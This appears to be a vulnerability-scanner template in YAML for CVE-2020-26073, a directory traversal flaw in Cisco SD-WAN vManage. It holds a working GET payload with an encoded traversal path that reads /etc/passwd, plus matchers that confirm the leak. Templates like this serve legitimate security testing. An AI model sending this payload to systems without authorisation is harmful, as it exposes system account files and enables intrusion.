22 lines
550 B
YAML
22 lines
550 B
YAML
id: CVE-2020–26073
|
||
info:
|
||
name: Cisco SD-WAN vManage Software Directory Traversal
|
||
author: madrobot
|
||
severity: high
|
||
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020–26073
|
||
tags: Directory Traversal
|
||
|
||
requests:
|
||
- method: GET
|
||
path:
|
||
- "{{BaseURL}}/dataservice/disasterrecovery/download/token/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2Fetc%2Fpasswd"
|
||
matchers-condition: and
|
||
matchers:
|
||
- type: status
|
||
status:
|
||
- 200
|
||
- type: regex
|
||
words:
|
||
- "root:[x*]:0:0:"
|
||
part: body
|